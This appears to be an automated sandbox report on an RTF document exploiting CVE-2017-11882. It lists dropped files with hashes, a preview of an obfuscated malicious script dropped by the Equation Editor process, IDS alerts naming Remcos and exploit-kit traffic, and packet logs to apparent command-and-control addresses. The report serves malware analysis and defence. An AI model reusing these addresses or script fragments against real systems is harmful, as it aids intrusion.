                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:CE338FE6899778AACFC28414F2D9498B
                          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                          Malicious:false
                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):14848
                          Entropy (8bit):3.5953326421230978
                          Encrypted:false
                          SSDEEP:384:CGJfJF7d/PED5LZu0aK4+Cuz69ETUnU2tRCC8:CGjhED5tfai9mWTmR/8
                          MD5:596A615C786EA1C87821DEFA4ECD7DE8
                          SHA1:7B9470A00C69587210605A593CA48B72CBDC0184
                          SHA-256:A068CA43338EE8A0B1CB7C334B8118B16D738059D7D87221B893B839A5B929AF
                          SHA-512:994E0D85B5181E8BF9E3F92672AA1C3E8AC818196540555FE96E9471B96FAA2D6CFA3AF3D4FD88B55DFC98A379F6776EF264033664F298590685BC77E3405CDF
                          Malicious:false
                          Preview:....5.8.0.0.5.1.3.7.*.6.~.,.?.%.6.3.%.[.|.).;.?.4.>.?.0...?.8.2.3.%.~.].$.[.-...<./.]...$.8...|.^...,.*.#.,.,.:.1.(.~.2.9...&.(.'.4.=.%.-.?.'.(.&.:.2.>.@.>.-.:.5...^.6.&.,.<.,...!.-.9.(.).?.!.].!.+.].`.?.1...-.|.0.-.7.2.;.).-.0.@.@.....;.'._.6.,.*.).^.?.<.=.?.-.'.$.9.?.3.=...#.2.?.:.?.|.=.<.?.2.`...?...?.6.?.9.,.6.0.~.$.2.!.?.8.#.$.<.?.!.?.$.>.:.?.$.`.$.&.?.(.?.(.>.1._.=...?.;.|.,.2.).$.>.|.#.9.?.7.'.^.'._.0.2.?.5...!.]...7.;.4.;.<...:.+.6.8.=.8.<.8.,.*.~.|.%.^.).~.@._.[.;.*.].;.1.(._.&.-.>.%.5.?.|.3.0.?.-.<...3.)...-.)...,.$...].....4.#.?.'.9.&.$.?.1.3.(.?.%.@.=.!.%.5.0.].:.?.?.&.].?.:.?.?.6.2.%.#.?.....#...2.(.].%.2.8.;.?.-.~.?.6.=.$.:.<.]._.<.<.].$.?.4.5.+.^.%._.`.=.3.?.+.-.:.'.+.+...?.(.?.!.8.>.4.[.?.].*.5.?.>.).?.&.|.?.0.9.^.4.5.'.).%.=.4.^.?.1.?.7...$...1.@.2.>.^...+.?.[.6._...@...>.1...?.>...[.!.`.~.;.>.?.;.[.......*.9.?.4.!._.9.;.>.[.].<.#.@._.[.?.+.?.+.....!.6.`.(.#.(...?./.:.+.&.9.^.....^.[.5.....2...5.%.#.*.@.%.=.7.(.&.%.7.$.;.:.;.].?.[.>.3.^.%.6.].2.#...?.0.].*.$.:.,.?.;._.
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):1024
                          Entropy (8bit):0.05390218305374581
                          Encrypted:false
                          SSDEEP:3:ol3lYdn:4Wn
                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                          Malicious:false
                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x03900705, page size 32768, DirtyShutdown, Windows version 6.1
                          Category:dropped
                          Size (bytes):21037056
                          Entropy (8bit):1.1390568396758962
                          Encrypted:false
                          SSDEEP:24576:lO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:lOEXs1LuHqqEXwPW+RHA6m1fN
                          MD5:BBBD80E55FB5C003EA4B12415BBA9046
                          SHA1:98295E02E4A4C80534DB036154A1F030AEA77B84
                          SHA-256:0042402C0DD88F4CC4569F07C15768771FB8C9FF6F9670C80B49C4CD6357684C
                          SHA-512:D85A9123F1173E17DECC018E6D2215EC338F3559A4C515CF52AC3A547F9238AB1EC5403F685E91BEAEC161C72BD600A8E1182E5EFF3E7408B03304521908BA45
                          Malicious:false
                          Preview:....... ........................u..............................;:...{..7....|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                          Category:dropped
                          Size (bytes):2
                          Entropy (8bit):1.0
                          Encrypted:false
                          SSDEEP:3:Qn:Qn
                          MD5:F3B25701FE362EC84616A93A45CE9998
                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                          Malicious:false
                          Preview:..
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Fri Sep 6 08:25:54 2024, length=103450, window=hide
                          Category:dropped
                          Size (bytes):1239
                          Entropy (8bit):4.521382520606573
                          Encrypted:false
                          SSDEEP:24:814W/XTr8bkOVHCdOyJeV+HCdOwDv3qK57u:83/XTwbvHCZ7HCIK9u
                          MD5:7853DC92267243D44BF4D42592F90D51
                          SHA1:038405F6F0037FF743D59F5690387891A626B829
                          SHA-256:03FBF8BC49FC4224F68240019968CC0EF7262914864C550221C99FE0EF4515D5
                          SHA-512:D670322E7BF1CC44ED90377E134EFC981F8CFF7C90DBC2B5712DD146D8B6FC470725EA142C8B1972E93EEC2B9773CFEFC0ECAAD3A2CFFA90F1483D869DC3A552
                          Malicious:false
                          Preview:L..................F.... ...&...r...&...r.......>...........................)....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....&Y9K..user.8......QK.X&Y9K*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....&Y<K .SECURI~1.RTF..........WD..WD.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...1.2.1.8.7...2.9.1.9.8...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf.R.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...1.2.1.8.7...2.9.1.9.8...r.t.f.........:..,.LB.)...Ag.............
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:Generic INItialization configuration [folders]
                          Category:dropped
                          Size (bytes):145
                          Entropy (8bit):4.881114782064215
                          Encrypted:false
                          SSDEEP:3:H9rbcK+JiMUXEwlm4P8bcK+JiMUXEwlv:H9rwKNVXEjwKNVXEy
                          MD5:ADC6772097ADB6808F5D3B599D71A8BE
                          SHA1:D52667E650405A7BB455EF388C94B12508E9F396
                          SHA-256:BAD7760415220145B7EC8C7E643FA215DB7E9DA3C19DD5303745188D12206D87
                          SHA-512:592261D9E04B2DC96208EA63432DCAA9199D31DA6ECE79B9F33C6EA2B0175B546CFE34C96C6F59CA1ED6F05E1CBDF0F58E5260F257D63627439829FBC7D42DC5
                          Malicious:false
                          Preview:[misc]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.LNK=0..[folders]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.LNK=0..
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):162
                          Entropy (8bit):2.4797606462020307
                          Encrypted:false
                          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                          Malicious:false
                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):195600
                          Entropy (8bit):3.8644523012696523
                          Encrypted:false
                          SSDEEP:3072:LBbdxVpFzbQKUxc63rKxN+vHYnL33gt5pIGwf5pyb0la1T0H7s9LqkzsX0T:VbjVpFzbQKmbGKvHW3aWElsI
                          MD5:99B11BAD85FE65119B8ABDA67E671E46
                          SHA1:3C41D084CA96CB9EEE5F2813C4C7AFEC43733B40
                          SHA-256:6F1DE9C391202040823D62D2CE5FFB5BEA5D629E75F923F4796D1452E6E392D2
                          SHA-512:DF1B8F41A1CFC21E6008652ED1BF740CA25ADA553DDB2332FA4A7E7CA268F6696581FAB7127E9C89AD641792AE79D88B5291093DD9FAB87D17F5FCF73F07B189
                          Malicious:true
                          Preview:......W.U.Z.W.u.Q.P.W.I.B.e.c. .=. .".m.j.l.k.Z.L.O.o.r.l.B.z.".....k.a.q.L.L.x.W.x.L.Q.L.h. .=. .".b.c.P.k.O.H.W.z.i.L.c.W.".....c.N.G.P.k.L.m.c.Q.u.J.f. .=. .".c.H.h.h.W.A.G.L.A.k.m.v.".....j.k.g.l.T.W.e.G.i.J.K.n. .=. .".e.Z.O.L.m.p.p.T.B.L.L.L.".....K.x.W.Z.B.t.H.t.o.h.z.d. .=. .".e.i.v.u.L.a.U.j.z.L.x.s.".....i.k.h.C.W.K.c.R.I.C.W.W. .=. .".f.G.W.f.q.c.z.i.i.t.G.C.".....m.u.e.h.W.P.v.u.L.T.U.a. .=. .".f.L.L.W.B.k.K.W.K.q.t.x.".........K.L.k.v.W.W.W.S.l.z.v.d. .=. .".o.b.v.a.g.u.e.a.r.B.L.e.a.f.L.L.P.".....z.k.O.L.e.a.Z.o.b.h.R.U. .=. .".l.t.P.W.L.k.m.L.A.W.m.K.".....h.P.i.z.A.p.Z.d.U.o.d.h. .=. .".W.k.U.m.j.U.o.v.a.g.u.e.a.r.h.z.S.".....s.k.N.l.e.n.K.r.e.n.Q.x. .=. .".B.e.c.e.z.i.G.x.L.A.i.m.".....d.N.A.q.o.Z.G.L.U.P.f.z. .=. .".h.W.b.Z.h.p.p.W.l.T.u.U.".....G.a.b.W.d.q.N.h.h.m.u.Z. .=. .".t.Q.Q.K.U.x.i.W.R.I.a.L.".....m.h.t.T.U.b.o.m.W.K.t.c. .=. .".W.L.r.z.I.u.R.c.L.c.I.l.".....g.f.G.W.L.h.G.e.m.k.m.K. .=. .".C.G.f.c.W.z.A.K.p.d.m.o.".....u.o.m.R.N.k.R.K.C.q.B.o. .=. .".W.C.c.c.
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):162
                          Entropy (8bit):2.4797606462020307
                          Encrypted:false
                          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                          Malicious:false
                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                          File type:Rich Text Format data, version 1
                          Entropy (8bit):2.7048104634693875
                          TrID:
                          • Rich Text Format (5005/1) 55.56%
                          • Rich Text Format (4004/1) 44.44%
                          File name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf
                          File size:103'450 bytes
                          MD5:124bfb183c9b3f3b757fa9559967ab95
                          SHA1:e2004e5b5803b0ab65c9b8142808f9367a9b1c8a
                          SHA256:1a7f73810fe77606fa0b04f8425407e39b2c6ba612cb287d56b7e46506781840
                          SHA512:6bac823ffbeefb8bb92a3222661e44704d8212ee0a60912db4ee2df58eafb645b328dc8dbe297377893ac66f0f1b3e2bf33aef5b876f64be411712e70c58d4b5
                          SSDEEP:768:ZuwXIcvKEVtQ6Z3aV14YziPwAS7EfLWcO:ZuwXuEVD3aV14aiPq7sLa
                          TLSH:5AA3E028C78F51A5CF556277532A8E0946FCB33EB70952B2746C933133ADD3D09A6878
                          File Content Preview:{\rtf1.....{\*\adjust10Value836040134 \[}.{\758005137*6~,?%63%[|);?4>?0.?823%~]$[-.</].$8.|^.,*#,,:1(~29.&('4=%-?'(&:2>@>-:5.^6&,<,.!-9()?!]!+]`?1.-|0-72;)-0@@..;'_6,*)^?<=?-'$9?3=.#2?:?|=<?2`.?.?6?9,60~$2!?8#$<?!?$>:?$`$&?(?(>1_=.?;|,2)$>|#9?7'^'_02?5.!]
                          Icon Hash:2764a3aaaeb7bdbf
                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                          000001BA8hno
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-09-06T11:26:04.354590+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.224.2443192.168.2.2249162TCP
                          2024-09-06T11:26:05.269595+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1185.239.241.18480192.168.2.2249163TCP
                          2024-09-06T11:26:05.269595+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1185.239.241.18480192.168.2.2249163TCP
                          2024-09-06T11:26:08.593962+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224916445.89.247.652201TCP
                          2024-09-06T11:26:09.960512+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249166178.237.33.5080TCP
                          2024-09-06T11:26:10.069561+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224916545.89.247.652201TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Sep 6, 2024 11:25:58.196923971 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.201962948 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.202022076 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.202282906 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.207088947 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.698981047 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.699003935 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.699014902 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.699027061 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.699038029 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.699049950 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.699060917 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.699070930 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.699074030 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.699083090 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.699099064 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.699100971 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.699110031 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.699136019 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.703948975 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.704085112 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.704102039 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.704128027 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.704139948 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.704144955 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.704191923 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.704191923 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.785604000 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.785630941 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.785645962 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.785657883 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.785676003 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.785722017 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.790266037 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.790278912 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.790333033 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.790456057 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.790467024 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.790501118 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.795350075 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.795362949 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.795375109 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.795387030 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.795408010 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.795425892 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.801407099 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.801419973 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.801431894 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.801449060 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.801455021 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.801460981 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.801472902 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.801496029 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.806574106 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.806592941 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.806621075 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.806641102 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.806648016 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.806659937 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.806669950 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.806690931 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.806714058 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.811952114 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.811964035 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.811975002 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.811996937 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.812011003 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.872364044 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.872407913 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.872422934 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.872438908 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.872472048 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.872473001 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.877214909 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.877238989 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.877255917 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.877279997 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.877279043 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.877279043 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.877315044 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.881968975 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.881982088 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.881994009 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.882005930 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.882014990 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.882030964 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.882039070 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.886670113 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.886682034 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.886693001 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.886704922 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.886715889 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.886718988 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.886739016 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.886746883 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.891490936 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.891506910 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.891520023 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.891534090 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.891541004 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.891560078 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.891568899 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.896301985 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.896323919 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.896338940 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.896354914 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.896362066 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.896369934 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.896375895 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.896383047 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.896404982 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.901165962 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.901187897 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.901204109 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.901218891 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.901222944 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.901242018 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.901247978 CEST4916180192.168.2.2285.239.241.184
